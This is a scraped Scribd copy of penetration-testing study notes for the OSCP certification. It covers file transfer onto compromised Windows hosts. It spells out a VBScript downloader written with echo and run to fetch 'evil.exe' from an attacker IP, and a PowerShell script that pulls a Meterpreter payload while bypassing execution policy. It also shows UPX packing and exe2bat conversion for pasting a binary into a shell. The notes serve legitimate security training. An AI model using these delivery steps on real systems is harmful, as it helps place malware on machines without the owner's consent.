0% found this document useful (0 votes)

9 views

OSCP Notes – File Transfers

The document provides notes on file transfer methods for both Linux and Windows systems, including commands for wget, scp, curl, TFTP, FTP, VBSCRIPT, and PowerShell. It outlines setup instructions for each method, emphasizing the need for non-interactive commands in compromised environments. Additionally, it includes optimization and verification steps for executable files being transferred.

Uploaded by

kabegij928

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

9 views

OSCP Notes – File Transfers

Uploaded by

kabegij928

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 9

service apache2 start
Commands on victim machine : Write set of commands in text le
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBu fer, lngCounter, fs, ts >> wget.vbs

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“Microso t.XMLHTTP”) >> wget.vbs
echo http.Open “GET”, strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = “” >> wget.vbs
echo strBu fer = “” >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Run wget.vbs at victim machine

cscript wget.vbs http://192.168.xx.xx/evil.exe evil.exe

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
POWERSHELL

On victim machine, write set of commands in a ps1 le

echo $storageDir = $pwd > wget.ps1

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = “http://10.xx.xx.xx:8000/Meterpreter_windows_4444.exe” >>wget.ps1
echo $ le = “new-exploit.exe” >>wget.ps1
echo $webclient.DownloadFile($url,$ le) >>wget.ps1

Run wget.ps1 on victim machine

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoPro le -File wget.ps1

DEBUG.EXE

1. Optimize the exe to be transferred

upx -9 <exe le>

2. Verify if the exe is still running ne

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
wine <exe le>

3. Convert exe to text le

wine exe2bat.exe <exe le> <txt le>

Text le will be generated, simply copy and paste the text le contents to the shell.

OSCP Notes – File Transfers

Uploaded by

OSCP Notes – File Transfers

Uploaded by

MENU